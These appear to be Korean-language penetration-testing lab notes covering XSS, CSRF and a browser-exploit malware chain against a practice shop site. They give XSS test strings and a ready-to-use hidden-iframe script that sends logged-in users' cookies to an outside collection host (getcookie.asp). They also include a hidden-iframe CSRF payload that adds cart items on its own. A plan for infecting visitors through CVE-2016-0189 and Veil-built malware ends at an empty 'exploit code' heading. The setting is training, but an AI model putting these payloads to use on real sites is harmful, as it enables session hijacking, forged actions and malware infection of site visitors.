#모의해킹 사이트
#유선랜: http://10.10.0.153/
#무선랜: http://61.39.155.24:50003/

#공유서버
#http://192.168.100.30/

#XSS(Cross Site Scripting)
1. XSS 취약점 공격은 스크립트를 이용하여 웹 사이트 접속자로 하여금 주로 악성코드감염 또는 쿠키 탈취를 이용한 권한획득이 가능한 공격기법

2. 점검문자열
 1) <script>alert("xss");</script>
 2) <script>alert(document.cookie);</script>
 3) <iframe src="https://www.nate.com/"></iframe>

#로그인한 사용자 쿠키값 탈취 악성스크립트 구문
<iframe id="targetFrame" width=0 height=0></iframe><script>document.getElementById("targetFrame").src="http://192.168.0.133/getcookie.asp?cookie="+document.cookie;</script>


#CSRF를 이용하여 게시물 클릭 시 상품 장바구니 자동으로 담기게 하기...
1. 장바구니 요청 URL: http://10.10.0.153/demoshop/shopping_cart/cart_set.asp
2. POST Data: top=1&g_code=20081031141418&ea=1
3. 스크립트
<iframe src="http://10.10.0.153/demoshop/shopping_cart/cart_set.asp?top=1&g_code=20081031141418&ea=7469" width=0 height=0></iframe>

#XSS 취약점이 존재하는 웹 사이트에 접속자 PC를 대상으로 악성코드 감염 공격
1. 악성코드 감염경로
 1) XSS 취약점이 존재하는 사이트
 2) 게시판의 악성스크립트를 이용

2. 환경구성
 1) 공격자
  = KALI Linux
   - Exploit Page(+Payload) 구성: CVE-2016-0189
   - (윈도우기반) 악성코드 제작: Veil-Framework

 2) 피해자
  = Windows PC
   - Internet Explorer 11 Vulnerability: CVE-2016-0189(vbscript memory corruption bug)

3. CVE-2016-0189 Exploit Code





























